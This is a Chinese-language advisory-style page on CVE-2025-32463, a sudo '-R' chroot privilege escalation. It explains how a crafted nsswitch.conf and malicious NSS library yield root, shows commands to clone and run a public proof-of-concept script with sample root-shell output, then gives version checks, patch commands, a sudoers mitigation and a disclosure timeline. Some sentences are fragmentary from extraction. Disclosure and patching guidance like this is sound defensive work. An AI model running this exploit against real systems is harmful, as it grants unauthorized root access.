
CVE-2025-32463

最广泛使用的 Linux 权限管理器中的严重本地权限提升漏洞
任何本地用户(即使没有 sudoers 权限)都可能通过 sudo -R 在数秒内获取 root 权限
CVE-2025-32463(也称为“chroot-to-root”)是 sudo 中的严重本地权限提升漏洞。
它允许任何本地非特权用户——甚至那些不在 sudoers 中的用户——仅通过使用 -R / --chroot 选项即可获得完整的 root 访问权限。
该漏洞在 sudo 1.9.14(2023 年 6 月)中引入,并一直存在到 1.9.17p1(2025 年 6 月)。它不是传统的 bug,而是 sudo 在策略检查之前处理用户控制的 chroot 内路径解析时产生的危险副作用。
官方 Sudo 公告:“攻击者可以利用 sudo 的
-R选项以 root 身份运行任意命令,即使他们不在 sudoers 文件中。”
现实情况:
该漏洞源于 2023 年 sudo 命令匹配逻辑的一项更改:
-R /path 时,sudo 在完全评估 sudoers 策略之前调用 pivot_root()。/etc/nsswitch.conf。/etc/nsswitch.conf(例如,passwd: /woot1337)libnss_/woot1337.so.2。关键洞察:-R 选项即使对没有 sudo 权限的用户也允许使用,使其成为完美的攻击向量。
仅 sudo 1.9.14 至 1.9.17(1.9.17p1 之前)
广泛受影响:
不受影响:
单行漏洞利用(来自 Stratascale CRU):
# 1 – 克隆仓库
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – 构建并运行 Docker 镜像(标签为 "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – 在容器中运行漏洞利用(直接执行 root 命令或进入 root shell)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ 警告:CVE-2025-32463 漏洞利用 PoC ⚠
═══════════════════════════════════════════════════════════════
此脚本仅适用于您拥有系统的授权测试。
在未经授权的系统上运行是违法的。
测试后请立即修补(sudo 1.9.17p1+)。
[+] 创建临时漏洞利用阶段...
[+] 编译恶意 NSS 库...
[+] 触发 sudo -R ...(期待 root shell)
(如果成功,您将 drop 到 root bash 提示符)
[!] CVE-2025-32463 已触发 - 正在获取 root...
[+] 您现在已获得 root 权限!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ 如果版本为 1.9.17p1 或更高(或 ≤ 1.9.13)则安全
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
在 /etc/sudoers(或 /etc/sudoers.d/ 中的文件)中添加:
Defaults !use_chroot
搜索并删除任何 CHROOT= 或 runchroot= 行。
2026 专业提示:扫描旧的 Docker 镜像、CI 运行器和遗留虚拟机——许多仍携带易受攻击的 sudo 快照。
--chroot)如果未隔离,可能会成为攻击面。此事件强化了即使在核心系统工具中也需遵循最小权限原则的必要性。
截至 2026 年 3 月的状态:✅ 已在所有现代系统上完全缓解 • Chroot 功能已弃用 • 生态系统更加安全
为在 KEV 命中前修补的 Linux 管理员们献上 ❤️
| 日期 | 事件 |
|---|
| 2023 年 6 月 | sudo 1.9.14 发布(漏洞引入) |
| 2025 年 4 月 1 日 | Rich Mirch 私下报告 |
| 2025 年 4 月 8 日 | 分配 CVE-2025-32463 |
| 2025 年 6 月 9 日 | 提出补丁 |
| 2025 年 6 月 30 日 | 公开披露 + Stratascale 博客 + 完整 PoC |
| 2025 年 7 月 | sudo 1.9.17p1 发布;主要发行版推送更新 |
| 2025 年 9 月 29 日 | 加入 CISA KEV 目录 |
| 2026 年 | Chroot 功能在整个生态系统中完全弃用 |